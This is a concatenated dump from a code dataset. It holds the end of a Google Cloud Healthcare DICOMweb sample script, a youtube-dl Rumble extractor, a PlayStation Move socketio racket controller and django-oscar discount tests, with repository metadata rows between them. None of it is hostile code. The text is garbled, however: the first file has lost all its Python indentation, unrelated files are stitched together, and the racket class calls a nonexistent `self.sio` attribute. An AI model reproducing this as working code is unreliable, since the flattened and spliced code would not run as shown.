"""Handles the POST requests specified in the DICOMweb standard."""
url = '{}/projects/{}/locations/{}'.format(base_url,
project_id, cloud_region)
dicomweb_path = '{}/datasets/{}/dicomStores/{}/dicomWeb/studies'.format(
url, dataset_id, dicom_store_id)
# Make an authenticated API request
session = get_session(service_account_json)
with open(dcm_file, 'rb') as dcm:
dcm_content = dcm.read()
content_type = 'application/dicom'
headers = {'Content-Type': content_type}
try:
response = session.post(
dicomweb_path,
data=dcm_content,
headers=headers)
response.raise_for_status()
print('Stored DICOM instance:')
print(response.text)
return response
except HttpError as err:
print(err)
return ""
# [END healthcare_dicomweb_store_instance]
# [START healthcare_dicomweb_search_instances]
def dicomweb_search_instance(
service_account_json,
base_url,
project_id,
cloud_region,
dataset_id,
dicom_store_id):
"""Handles the GET requests specified in DICOMweb standard."""
url = '{}/projects/{}/locations/{}'.format(base_url,
project_id, cloud_region)
dicomweb_path = '{}/datasets/{}/dicomStores/{}/dicomWeb/instances'.format(
url, dataset_id, dicom_store_id)
# Make an authenticated API request
session = get_session(service_account_json)
headers = {
'Content-Type': 'application/dicom+json; charset=utf-8'
}
response = session.get(dicomweb_path, headers=headers)
response.raise_for_status()
instances = response.json()
print('Instances:')
print(json.dumps(instances, indent=2))
return instances
# [END healthcare_dicomweb_search_instances]
# [START healthcare_dicomweb_retrieve_study]
def dicomweb_retrieve_study(
service_account_json,
base_url,
project_id,
cloud_region,
dataset_id,
dicom_store_id,
study_uid):
"""Handles the GET requests specified in the DICOMweb standard."""
url = '{}/projects/{}/locations/{}'.format(base_url,
project_id, cloud_region)
dicomweb_path = '{}/datasets/{}/dicomStores/{}/dicomWeb/studies/{}'.format(
url, dataset_id, dicom_store_id, study_uid)
# When specifying the output file, use an extension like ".multipart."
# Then, parse the downloaded multipart file to get each individual
# DICOM file.
file_name = 'study.multipart'
# Make an authenticated API request
session = get_session(service_account_json)
response = session.get(dicomweb_path)
response.raise_for_status()
with open(file_name, 'wb') as f:
f.write(response.content)
print('Retrieved study and saved to file ' +
'{} in current directory'.format(file_name))
return response
# [END healthcare_dicomweb_retrieve_study]
# [START healthcare_dicomweb_retrieve_instance]
def dicomweb_retrieve_instance(
service_account_json,
base_url,
project_id,
cloud_region,
dataset_id,
dicom_store_id,
study_uid,
series_uid,
instance_uid):
"""Handles the GET requests specified in the DICOMweb standard."""
url = '{}/projects/{}/locations/{}'.format(base_url,
project_id, cloud_region)
dicom_store_path = '{}/datasets/{}/dicomStores/{}'.format(
url, dataset_id, dicom_store_id)
dicomweb_path = '{}/dicomWeb/studies/{}/series/{}/instances/{}'.format(
dicom_store_path, study_uid, series_uid, instance_uid)
file_name = 'instance.dcm'
# Make an authenticated API request
session = get_session(service_account_json)
headers = {
'Accept': 'application/dicom; transfer-syntax=*'
}
response = session.get(dicomweb_path, headers=headers)
response.raise_for_status()
with open(file_name, 'wb') as f:
f.write(response.content)
print('Retrieved DICOM instance and saved to file ' +
'{} in current directory'.format(file_name))
return response
# [END healthcare_dicomweb_retrieve_instance]
# [START healthcare_dicomweb_retrieve_rendered]
def dicomweb_retrieve_rendered(
service_account_json,
base_url,
project_id,
cloud_region,
dataset_id,
dicom_store_id,
study_uid,
series_uid,
instance_uid):
"""Handles the GET requests specified in the DICOMweb standard."""
url = '{}/projects/{}/locations/{}'.format(base_url,
project_id, cloud_region)
dicom_store_path = '{}/datasets/{}/dicomStores/{}'.format(
url, dataset_id, dicom_store_id)
instance_path = '{}/dicomWeb/studies/{}/series/{}/instances/{}'.format(
dicom_store_path, study_uid, series_uid, instance_uid)
dicomweb_path = '{}/rendered'.format(instance_path)
file_name = 'rendered_image.png'
# Make an authenticated API request
session = get_session(service_account_json)
headers = {
'Accept': 'image/png'
}
response = session.get(dicomweb_path, headers=headers)
response.raise_for_status()
with open(file_name, 'wb') as f:
f.write(response.content)
print('Retrieved rendered image and saved to file ' +
'{} in current directory'.format(file_name))
return response
# [END healthcare_dicomweb_retrieve_rendered]
# [START healthcare_dicomweb_delete_study]
def dicomweb_delete_study(
service_account_json,
base_url,
project_id,
cloud_region,
dataset_id,
dicom_store_id,
study_uid):
"""Handles DELETE requests equivalent to the GET requests specified in
the WADO-RS standard.
"""
url = '{}/projects/{}/locations/{}'.format(base_url,
project_id, cloud_region)
dicomweb_path = '{}/datasets/{}/dicomStores/{}/dicomWeb/studies/{}'.format(
url, dataset_id, dicom_store_id, study_uid)
# Make an authenticated API request
session = get_session(service_account_json)
headers = {
'Content-Type': 'application/dicom+json; charset=utf-8'
}
response = session.delete(dicomweb_path, headers=headers)
response.raise_for_status()
print('Deleted study.')
return response
# [END healthcare_dicomweb_delete_study]
def parse_command_line_args():
"""Parses command line arguments."""
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument(
'--service_account_json',
default=os.environ.get("GOOGLE_APPLICATION_CREDENTIALS"),
help='Path to service account JSON file.')
parser.add_argument(
'--base_url',
default=_BASE_URL,
help='Healthcare API URL')
parser.add_argument(
'--project_id',
default=(os.environ.get("GOOGLE_CLOUD_PROJECT")),
help='GCP project name')
parser.add_argument(
'--cloud_region',
default='us-central1',
help='GCP region')
parser.add_argument(
'--dataset_id',
default=None,
help='Name of dataset')
parser.add_argument(
'--dicom_store_id',
default=None,
help='Name of DICOM store')
parser.add_argument(
'--dcm_file',
default=None,
help='File name for DCM file to store.')
parser.add_argument(
'--study_uid',
default=None,
help='Unique identifier for a study.')
parser.add_argument(
'--series_uid',
default=None,
help='Unique identifier for a series.')
parser.add_argument(
'--instance_uid',
default=None,
help='Unique identifier for an instance.')
command = parser.add_subparsers(dest='command')
command.add_parser(
'dicomweb-store-instance',
help=dicomweb_store_instance.__doc__)
command.add_parser(
'dicomweb-search-instance',
help=dicomweb_search_instance.__doc__)
command.add_parser(
'dicomweb-retrieve-study',
help=dicomweb_retrieve_study.__doc__)
command.add_parser(
'dicomweb-retrieve-instance',
help=dicomweb_retrieve_instance.__doc__)
command.add_parser(
'dicomweb-retrieve-rendered',
help=dicomweb_retrieve_rendered.__doc__)
command.add_parser(
'dicomweb-delete-study',
help=dicomweb_delete_study.__doc__)
return parser.parse_args()
def run_command(args):
"""Calls the program using the specified command."""
if args.project_id is None:
print('You must specify a project ID or set the '
'"GOOGLE_CLOUD_PROJECT" environment variable.')
return
elif args.command == 'dicomweb-store-instance':
dicomweb_store_instance(
args.service_account_json,
args.base_url,
args.project_id,
args.cloud_region,
args.dataset_id,
args.dicom_store_id,
args.dcm_file)
elif args.command == 'dicomweb-search-instance':
dicomweb_search_instance(
args.service_account_json,
args.base_url,
args.project_id,
args.cloud_region,
args.dataset_id,
args.dicom_store_id)
elif args.command == 'dicomweb-retrieve-study':
dicomweb_retrieve_study(
args.service_account_json,
args.base_url,
args.project_id,
args.cloud_region,
args.dataset_id,
args.dicom_store_id,
args.study_uid)
elif args.command == 'dicomweb-retrieve-instance':
dicomweb_retrieve_instance(
args.service_account_json,
args.base_url,
args.project_id,
args.cloud_region,
args.dataset_id,
args.dicom_store_id,
args.study_uid,
args.series_uid,
args.instance_uid)
elif args.command == 'dicomweb-retrieve-rendered':
dicomweb_retrieve_rendered(
args.service_account_json,
args.base_url,
args.project_id,
args.cloud_region,
args.dataset_id,
args.dicom_store_id,
args.study_uid,
args.series_uid,
args.instance_uid)
elif args.command == 'dicomweb-delete-study':
dicomweb_delete_study(
args.service_account_json,
args.base_url,
args.project_id,
args.cloud_region,
args.dataset_id,
args.dicom_store_id,
args.study_uid)
def main():
args = parse_command_line_args()
run_command(args)
if __name__ == '__main__':
main()
| 29.369266
| 79
| 0.642405
|
4a0225109b53b196d486a5820b8b35b71f8fbf32
| 2,184
|
py
|
Python
|
youtube_dl/extractor/rumble.py
|
hackarada/youtube-dl
|
2ba46715a41fe074eab2221170b2ac78fab93fad
|
[
"Unlicense"
] | 66,635
|
2019-03-10T21:34:18.000Z
|
2022-03-31T23:50:31.000Z
|
youtube_dl/extractor/rumble.py
|
hackarada/youtube-dl
|
2ba46715a41fe074eab2221170b2ac78fab93fad
|
[
"Unlicense"
] | 10,936
|
2019-03-10T21:35:47.000Z
|
2022-03-31T23:46:52.000Z
|
youtube_dl/extractor/rumble.py
|
hackarada/youtube-dl
|
2ba46715a41fe074eab2221170b2ac78fab93fad
|
[
"Unlicense"
] | 15,194
|
2019-03-10T21:09:27.000Z
|
2022-03-31T22:13:49.000Z
|
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..compat import compat_str
from ..utils import (
determine_ext,
int_or_none,
parse_iso8601,
try_get,
)
class RumbleEmbedIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?rumble\.com/embed/(?:[0-9a-z]+\.)?(?P<id>[0-9a-z]+)'
_TESTS = [{
'url': 'https://rumble.com/embed/v5pv5f',
'md5': '36a18a049856720189f30977ccbb2c34',
'info_dict': {
'id': 'v5pv5f',
'ext': 'mp4',
'title': 'WMAR 2 News Latest Headlines | October 20, 6pm',
'timestamp': 1571611968,
'upload_date': '20191020',
}
}, {
'url': 'https://rumble.com/embed/ufe9n.v5pv5f',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
video = self._download_json(
'https://rumble.com/embedJS/', video_id,
query={'request': 'video', 'v': video_id})
title = video['title']
formats = []
for height, ua in (video.get('ua') or {}).items():
for i in range(2):
f_url = try_get(ua, lambda x: x[i], compat_str)
if f_url:
ext = determine_ext(f_url)
f = {
'ext': ext,
'format_id': '%s-%sp' % (ext, height),
'height': int_or_none(height),
'url': f_url,
}
bitrate = try_get(ua, lambda x: x[i + 2]['bitrate'])
if bitrate:
f['tbr'] = int_or_none(bitrate)
formats.append(f)
self._sort_formats(formats)
author = video.get('author') or {}
return {
'id': video_id,
'title': title,
'formats': formats,
'thumbnail': video.get('i'),
'timestamp': parse_iso8601(video.get('pubDate')),
'channel': author.get('name'),
'channel_url': author.get('url'),
'duration': int_or_none(video.get('duration')),
}
| 32.117647
| 90
| 0.486264
|
4a022514e05eb6f903a2463e07ac3198958a0d90
| 15,996
|
py
|
Python
|
rackets/src/rackets/sio_racket.py
|
alexoneill/15-love
|
bf7d1abbba7583d9686790d06b31b7fff5e8fcf4
|
[
"MIT"
] | 1
|
2017-04-30T13:06:02.000Z
|
2017-04-30T13:06:02.000Z
|
rackets/src/rackets/sio_racket.py
|
alexoneill/15-love
|
bf7d1abbba7583d9686790d06b31b7fff5e8fcf4
|
[
"MIT"
] | null | null | null |
rackets/src/rackets/sio_racket.py
|
alexoneill/15-love
|
bf7d1abbba7583d9686790d06b31b7fff5e8fcf4
|
[
"MIT"
] | null | null | null |
# sio_racket.py
# aoneill - 04/28/17
import math
import mock
import random
import socketIO_client as sio
from libs import psmoveapi
from src.base import event
from src.base import racket
from src.events import clear_event
class GameState(object):
'''
Game states for the controller.
'''
COLOR_SELECTION = 0
COLOR_WAIT = 1
START_WAIT = 2
SERVER = 3
GAMEPLAY = 4
HIT_BALL = 5
WON_RALLY = 6
LOST_RALLY = 7
END_GAME_WIN = 8
END_GAME_LOST = 9
def filter_player(func):
def inner(self, data):
if(('player_num' in data) and (data['player_num'] == self.player_num)):
del data['player_num']
if(len(data) > 0):
func(self, data)
else:
func(self)
return inner
class SIORacket(racket.Racket):
'''
socketio-based racket for gameplay.
This class includes many different events for actual gameplay!
'''
COLORS = {
psmoveapi.Button.SQUARE: (255.0 / 255.0, 105.0 / 255.0, 180.0 / 255.0),
psmoveapi.Button.TRIANGLE: ( 64.0 / 255.0, 255.0 / 255.0, 64.0 / 255.0),
psmoveapi.Button.CROSS: (24.0 / 255.0, 135.0 / 255.0, 189.0 / 255.0),
psmoveapi.Button.CIRCLE: (255.0 / 255.0, 168.0 / 255.0, 24.0 / 255.0)
}
# Base colors
COLOR_BAD = (1.0, 0, 0)
COLOR_GOOD = (0, 1.0, 0)
COLOR_CLEAR = (1.0, 1.0, 1.0)
# Colors for game outcomes
COLOR_LOSE = COLOR_BAD
COLOR_WIN = COLOR_GOOD
# Times for animations
COLOR_TRANS_TIME = 0.2
COLOR_WAIT_TIME = 0.1
COLOR_CONFIRM_TIME = 0.5
COLOR_REJECT_TIME = 0.25
SERVER_TIME = 1.0
HIT_TIME = 0.5
WON_RALLY_TIME = 1.0
LOST_RALLY_TIME = 1.0
OVER_TIME = 5.0
def __init__(self, sio_host, sio_port, player_num):
super(SIORacket, self).__init__()
# Save parameters
self.sio_host = sio_host
self.sio_port = sio_port
self.player_num = player_num
# socketio config
self._sio = sio.SocketIO(self.sio_host, self.sio_port)
# socketio callbacks
# Basic
self._sio.on('connect', self.on_sio_connect)
self._sio.on('disconnect', self.on_sio_disconnect)
# Game-based - Listening
self._sio.on('init_color_reject', self.on_sio_init_color_reject)
self._sio.on('init_color_confirm', self.on_sio_init_color_confirm)
self._sio.on('game_is_server', self.on_sio_game_is_server)
self._sio.on('game_missed_ball', self.on_sio_game_missed_ball)
self._sio.on('game_hit_ball', self.on_sio_game_hit_ball)
self._sio.on('game_won_rally', self.on_sio_game_won_rally)
self._sio.on('game_over', self.on_sio_game_over)
print 'socketio: init'
# Other parameters
self.state = GameState.COLOR_SELECTION
self.state_data = None
self.color_choice = None
self.enable_swings = False
print 'racket: init'
################################ Helpers #####################################
def generic_flash(self, freq = 1, rumble = True, color = True,
invert_color = False, invert_rumble = False, scale = 1.0,
color_scale = 1.0, rumble_scale = 1.0, color_min = 0.0,
rumble_min = 0.0):
# Generate a function which produces a 'flashing' effect on the rumble
# colors for the controller
def flash(time, controller, color_rgb):
# Given a color to flash around and the controller, flash based on the
# time argument (assumed to go from [0, 1])
# Get base power
power = (1 - math.cos(time * (2 * math.pi) * freq))/2
power = min(1.0, max(0.0, power * scale))
# Get color power
color_power = min(1.0, max(0.0, power * color_scale))
color_power = color_power if(invert_color) else (1 - color_power)
# Get rumble power
rumble_power = min(1.0, max(0.0, power * rumble_scale))
rumble_power = (1 - rumble_power) if(invert_rumble) else rumble_power
# Get the color
color_flash = tuple(map(lambda x: x * color_power, list(color_rgb)))
if(color):
controller.color = psmoveapi.RGB(*color_flash)
if(rumble):
controller.rumble = rumble_power
return flash
def generic_color_trans(self, source, target):
# Generate a function which produces a simple linear transition between
# two colors
def trans(time, controller, _):
# If the source is None, we consider this to actually be the user-chosen
# color (from the start)
source_rgb = source
if(source_rgb is None):
source_rgb = self.color_choice
# Similar for the target
target_rgb = target
if(target_rgb is None):
target_rgb = self.color_choice
# Unpack
(sr, sg, sb) = source_rgb
(tr, tg, tb) = target_rgb
# Scale and color
scale = lambda a, b: a + (b - a) * time
color = (scale(sr, tr), scale(sg, tg), scale(sb, tb))
controller.color = psmoveapi.RGB(*color)
return trans
######################## socketio Housekeeping ###############################
def on_sio_connect(self):
# Log the connection
print 'socketio: Connected'
def on_sio_disconnect(self):
# Log the drop
print 'socketio: Disconnected'
######################### socketio Listeners #################################
# @filter_player
def on_sio_init_color_confirm(self):
# Callback for a color confirmation event
print 'socketio: init_color_confirm'
# Ready for swings!
self.enable_swings = True
# Parameterize the transition with animations
self.state = GameState.START_WAIT
self.state_data = {
'events': [
(event.Event(SIORacket.COLOR_CONFIRM_TIME,
self.generic_flash(freq = 3, color_scale = 0.75)), None),
(clear_event.ClearEvent(), None)
]
}
# @filter_player
def on_sio_init_color_reject(self):
# Callback for a color rejection event
print 'socketio: init_color_reject'
# Disable swings (not at the game yet)
self.enable_swings = False
# Parameterize the transition with animations
self.state = GameState.COLOR_SELECTION
self.state_data = {
'events': [
(event.Event(SIORacket.COLOR_TRANS_TIME,
self.generic_color_trans(None, SIORacket.COLOR_BAD)), None),
(event.Event(SIORacket.COLOR_REJECT_TIME,
self.generic_flash()), SIORacket.COLOR_BAD),
(clear_event.ClearEvent(clear_color = True), SIORacket.COLOR_BAD),
(event.Event(SIORacket.COLOR_TRANS_TIME,
self.generic_color_trans(SIORacket.COLOR_BAD, None)), None)
]
}
# @filter_player
def on_sio_game_is_server(self):
# Callback for when the player becomes the person serving the ball
print 'socketio: game_is_server'
# Keep swings enabled
self.enable_swings = True
# Parameterize the transition with animations
self.state = GameState.SERVER
self.state_data = {
'events': [
(event.Event(SIORacket.SERVER_TIME,
self.generic_flash(freq = 2)), None),
(clear_event.ClearEvent(), None)
]
}
# @filter_player
def on_sio_game_missed_ball(self):
# Callback for a missed ball event
print 'socketio: game_missed_ball'
# Keep swings enabled
self.enable_swings = True
# Parameterize the transition with animations
self.state = GameState.LOST_RALLY
self.state_data = {
'events': [
(event.Event(SIORacket.COLOR_TRANS_TIME,
self.generic_color_trans(None, SIORacket.COLOR_LOSE)), None),
(event.Event(SIORacket.LOST_RALLY_TIME,
self.generic_flash(freq = 2)), SIORacket.COLOR_LOSE),
(clear_event.ClearEvent(clear_color = True), SIORacket.COLOR_LOSE),
(event.Event(SIORacket.COLOR_TRANS_TIME,
self.generic_color_trans(SIORacket.COLOR_LOSE, None)), None)
]
}
# @filter_player
def on_sio_game_hit_ball(self, data):
# Callback for a hit ball event
print 'socketio: game_hit_ball'
# Parse parameters
strength = data['strength']
# Keep swings enabled
self.enable_swings = True
# Parameterize the transition with animations
self.state = GameState.HIT_BALL
self.state_data = {
'events': [
(event.Event(SIORacket.HIT_TIME,
self.generic_flash(color_scale = strength)), None),
(clear_event.ClearEvent(), None)
]
}
# @filter_player
def on_sio_game_won_rally(self):
# Callback for when a player wins the rally
print 'socketio: game_won_rally'
# Keep swings enabled
self.enable_swings = True
# Parameterize the transition with animations
self.state = GameState.WON_RALLY
self.state_data = {
'events': [
(event.Event(SIORacket.COLOR_TRANS_TIME,
self.generic_color_trans(None, SIORacket.COLOR_WIN)), None),
(event.Event(SIORacket.WON_RALLY_TIME,
self.generic_flash(freq = 2)), SIORacket.COLOR_WIN),
(clear_event.ClearEvent(clear_color = True), SIORacket.COLOR_WIN),
(event.Event(SIORacket.COLOR_TRANS_TIME,
self.generic_color_trans(SIORacket.COLOR_WIN, None)), None),
]
}
# @filter_player
def on_sio_game_over(self, data):
# Callback for when the game ends
print 'socketio: game_over'
# Parse parameters
is_winner = data['is_winner']
# Disable swings
self.enable_swings = False
# Chose which color and which end-state
color = SIORacket.COLOR_WIN
if(is_winner):
self.state = GameState.END_GAME_WIN
else:
color = SIORacket.COLOR_LOSE
self.state = GameState.END_GAME_LOST
# Parameterize the transition with animations
self.state_data = {
'events': [
(event.Event(SIORacket.COLOR_TRANS_TIME,
self.generic_color_trans(None, color)), None),
(event.Event(SIORacket.OVER_TIME,
self.generic_flash(freq = 5)), color),
(clear_event.ClearEvent(clear_color = True), color),
(event.Event(SIORacket.COLOR_TRANS_TIME,
self.generic_color_trans(color, SIORacket.COLOR_CLEAR)), None)
]
}
########################### socketio Emits ###################################
def sio_init_color_choice(self, color):
# Method to communicate the color choice
self._sio.emit('init_color_choice', {
'player_num': self.player_num,
'color': color,
})
def sio_game_swing(self, hand, strength):
# Method to communicate the swing event
self._sio.emit('game_swing', {
'player_num': self.player_num,
'hand': (0 if(hand == racket.Handedness.LEFT) else 1),
'strength': strength
})
############################ Racket Events ###################################
def on_idle(self, controller, hand):
# On idle, the player should see a white ball and have no rumble
controller.color = psmoveapi.RGB(*self.color_choice)
controller.rumble = 0
def on_backswing(self, controller, hand):
# On a backswing, the player should see a red ball and have some rumble
controller.rumble = 0.33
def on_swing(self, controller, hand, strength):
# On a transition, the player should see a blue ball and have max rumble
controller.rumble = 1.0
# Send the swing
self.sio_game_swing(hand, strength)
print 'racket: Swing, %f' % strength
############################# Button Events ##################################
def on_button(self, controller, buttons):
# Method to parse button presses
# Temporary to cycle through animations
# Pressing the PS button simulates an in-order server event
if(psmoveapi.Button.PS in buttons):
if(self.state == GameState.COLOR_WAIT):
if(bool(random.randint(0, 1))):
self.on_sio_init_color_reject()
else:
self.on_sio_init_color_confirm()
elif(self.state == GameState.START_WAIT):
self.on_sio_game_is_server()
elif(self.state == GameState.GAMEPLAY):
end_rally = False
if(bool(random.randint(0, 3))):
self.on_sio_game_hit_ball({'strength': 0.75})
if(not bool(random.randint(0, 5))):
self.on_sio_game_won_rally()
end_rally = True
else:
self.on_sio_game_missed_ball()
end_rally = True
if(end_rally and not bool(random.randint(0, 5))):
if(bool(random.randint(0, 1))):
self.on_sio_game_over({'is_winner': False})
else:
self.on_sio_game_over({'is_winner': True})
return
# Color choosing logic
if(self.state == GameState.COLOR_SELECTION):
choices = (psmoveapi.Button.SQUARE, psmoveapi.Button.TRIANGLE,
psmoveapi.Button.CROSS, psmoveapi.Button.CIRCLE)
# Cycle through button options
for button in choices:
if(button in buttons):
self.color_choice = SIORacket.COLORS[button]
controller.color = psmoveapi.RGB(*self.color_choice)
return
# Color confirmation logic
if((self.color_choice is not None) and (psmoveapi.Button.MOVE in buttons)):
self.sio_init_color_choice(self.color_choice)
# Signal a transition to the next state
self.state = GameState.COLOR_WAIT
self.state_data = {
'events': [
(event.Event(SIORacket.COLOR_WAIT_TIME,
self.generic_flash(rumble_scale = 0.75,
color_scale = 0.75)), None),
(clear_event.ClearEvent(), None)
]
}
######################### Housekeeping Events ################################
def on_init(self, controller):
# Method for initialization
print 'psmove:', controller, 'connected!'
# Set the controller to be blank
controller.color = psmoveapi.RGB(*SIORacket.COLOR_CLEAR)
controller.rumble = 0
def on_leave(self, controller):
# Method for when a controller is dropped
print 'psmove:', controller, 'disconnected!'
def on_refresh(self, controller, swing_state):
# To be changed below
next_state = None
enable_swings = False
# Do nothing special if we are in the color selection / confirmation stage
if(self.state == GameState.COLOR_SELECTION
or self.state == GameState.COLOR_WAIT
or self.state == GameState.START_WAIT):
enable_swings = self.enable_swings
else:
# The following should allow swings and transition back to GAMEPLAY
if(self.state == GameState.SERVER
or self.state == GameState.GAMEPLAY
or self.state == GameState.HIT_BALL):
next_state = GameState.GAMEPLAY
enable_swings = True
# These should also transition to GAMEPLAY, but without swings
elif(self.state == GameState.WON_RALLY
or self.state == GameState.LOST_RALLY):
next_state = GameState.GAMEPLAY
# These should make the game end
elif(self.state == GameState.END_GAME_WIN
or self.state == GameState.END_GAME_LOST):
next_state = GameState.COLOR_SELECTION
enable_swings = False
# Work through pending animations
if(self.state_data is not None):
if('events' in self.state_data):
events = self.state_data['events']
# Remove events if there are none left
if(len(events) == 0):
if(next_state is not None):
self.state = next_state
del self.state_data['events']
else:
# Execute the event at the front of the queue
(event, color) = events[0]
color = self.color_choice if(color is None) else color
event.do(controller, color)
if(event.done()):
events.pop(0)
# Clean up the state data if no more exists
elif(len(self.state_data) == 0):
self.state_data = None
return enable_swings
def exit(self):
# Clean-up method
self.sio.disconnect()
| 30.880309
| 80
| 0.625531
|
4a02251f3b1a446fe525091aa32fbdfc5072b672
| 16,371
|
py
|
Python
|
tests/integration/offer/test_absolute_benefit.py
|
sainjusajan/django-oscar
|
466e8edc807be689b0a28c9e525c8323cc48b8e1
|
[
"BSD-3-Clause"
] | null | null | null |
tests/integration/offer/test_absolute_benefit.py
|
sainjusajan/django-oscar
|
466e8edc807be689b0a28c9e525c8323cc48b8e1
|
[
"BSD-3-Clause"
] | null | null | null |
tests/integration/offer/test_absolute_benefit.py
|
sainjusajan/django-oscar
|
466e8edc807be689b0a28c9e525c8323cc48b8e1
|
[
"BSD-3-Clause"
] | null | null | null |
from decimal import Decimal as D
from django.core.exceptions import ValidationError
from django.test import TestCase
import mock
from oscar.apps.offer import models
from oscar.apps.offer.utils import Applicator
from oscar.test.basket import add_product, add_products
from oscar.test import factories
class TestAnAbsoluteDiscountAppliedWithCountConditionOnDifferentRange(TestCase):
def setUp(self):
self.condition_product = factories.ProductFactory()
condition_range = factories.RangeFactory()
condition_range.add_product(self.condition_product)
self.condition = models.CountCondition.objects.create(
range=condition_range,
type=models.Condition.COUNT,
value=2)
self.benefit_product = factories.ProductFactory()
benefit_range = factories.RangeFactory()
benefit_range.add_product(self.benefit_product)
self.benefit = models.AbsoluteDiscountBenefit.objects.create(
range=benefit_range,
type=models.Benefit.FIXED,
value=D('3.00'))
self.offer = models.ConditionalOffer(
id=1, condition=self.condition, benefit=self.benefit)
self.basket = factories.create_basket(empty=True)
self.applicator = Applicator()
def test_succcessful_application_consumes_correctly(self):
add_product(self.basket, product=self.condition_product, quantity=2)
add_product(self.basket, product=self.benefit_product, quantity=1)
self.applicator.apply_offers(self.basket, [self.offer])
discounts = self.basket.offer_applications.offer_discounts
self.assertEqual(len(discounts), 1)
self.assertEqual(discounts[0]['freq'], 1)
def test_condition_is_consumed_correctly(self):
# Testing an error case reported on the mailing list
add_product(self.basket, product=self.condition_product, quantity=3)
add_product(self.basket, product=self.benefit_product, quantity=2)
self.applicator.apply_offers(self.basket, [self.offer])
discounts = self.basket.offer_applications.offer_discounts
self.assertEqual(len(discounts), 1)
self.assertEqual(discounts[0]['freq'], 1)
class TestAnAbsoluteDiscountAppliedWithCountCondition(TestCase):
def setUp(self):
range = models.Range.objects.create(
name="All products", includes_all_products=True)
self.condition = models.CountCondition.objects.create(
range=range,
type=models.Condition.COUNT,
value=2)
self.offer = mock.Mock()
self.benefit = models.AbsoluteDiscountBenefit.objects.create(
range=range,
type=models.Benefit.FIXED,
value=D('3.00'))
self.basket = factories.create_basket(empty=True)
def test_applies_correctly_to_empty_basket(self):
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('0.00'), result.discount)
self.assertEqual(0, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_basket_which_matches_condition_with_one_line(self):
add_product(self.basket, price=D('12.00'), quantity=2)
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(2, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
# Check the discount is applied equally to each item in the line
line = self.basket.all_lines()[0]
prices = line.get_price_breakdown()
self.assertEqual(1, len(prices))
self.assertEqual(D('10.50'), prices[0][0])
def test_applies_correctly_to_basket_which_matches_condition_with_multiple_lines(self):
# Use a basket with 2 lines
add_products(self.basket, [
(D('12.00'), 1), (D('12.00'), 1)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertTrue(result.is_successful)
self.assertFalse(result.is_final)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(2, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
# Check the discount is applied equally to each line
for line in self.basket.all_lines():
self.assertEqual(D('1.50'), line.discount_value)
def test_applies_correctly_to_basket_which_matches_condition_with_multiple_lines_and_lower_total_value(self):
# Use a basket with 2 lines
add_products(self.basket, [
(D('1.00'), 1), (D('1.50'), 1)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertTrue(result.is_successful)
self.assertFalse(result.is_final)
self.assertEqual(D('2.50'), result.discount)
self.assertEqual(2, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_basket_which_exceeds_condition(self):
add_products(self.basket, [
(D('12.00'), 2), (D('10.00'), 2)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(4, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_basket_which_exceeds_condition_with_smaller_prices_than_discount(self):
add_products(self.basket, [
(D('2.00'), 2), (D('4.00'), 2)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(4, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_basket_which_exceeds_condition_with_smaller_prices_than_discount_and_higher_prices_first(self):
add_products(self.basket, [
(D('2.00'), 2), (D('4.00'), 2)])
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(4, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
class TestAnAbsoluteDiscount(TestCase):
def setUp(self):
range = models.Range.objects.create(
name="All products", includes_all_products=True)
self.condition = models.CountCondition.objects.create(
range=range,
type=models.Condition.COUNT,
value=2)
self.benefit = models.AbsoluteDiscountBenefit.objects.create(
range=range,
type=models.Benefit.FIXED,
value=D('4.00'))
self.offer = mock.Mock()
self.basket = factories.create_basket(empty=True)
def test_applies_correctly_when_discounts_need_rounding(self):
# Split discount across 3 lines
for price in [D('2.00'), D('2.00'), D('2.00')]:
add_product(self.basket, price)
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('4.00'), result.discount)
# Check the discount is applied equally to each line
line_discounts = [line.discount_value for line in self.basket.all_lines()]
self.assertEqual(len(line_discounts), 3)
for i, v in enumerate([D('1.33'), D('1.33'), D('1.34')]):
self.assertEqual(line_discounts[i], v)
class TestAnAbsoluteDiscountWithMaxItemsSetAppliedWithCountCondition(TestCase):
def setUp(self):
range = models.Range.objects.create(
name="All products", includes_all_products=True)
self.condition = models.CountCondition.objects.create(
range=range,
type=models.Condition.COUNT,
value=2)
self.benefit = models.AbsoluteDiscountBenefit.objects.create(
range=range,
type=models.Benefit.FIXED,
value=D('3.00'),
max_affected_items=1)
self.offer = mock.Mock()
self.basket = factories.create_basket(empty=True)
def test_applies_correctly_to_empty_basket(self):
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('0.00'), result.discount)
self.assertEqual(0, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
def test_applies_correctly_to_basket_which_matches_condition(self):
add_product(self.basket, D('12.00'), 2)
result = self.benefit.apply(self.basket, self.condition, self.offer)
self.assertEqual(D('3.00'), result.discount)
self.assertEqual(2, self.basket.num_items_with_discount)
self.assertEqual(0, self.basket.num_items_without_discount)
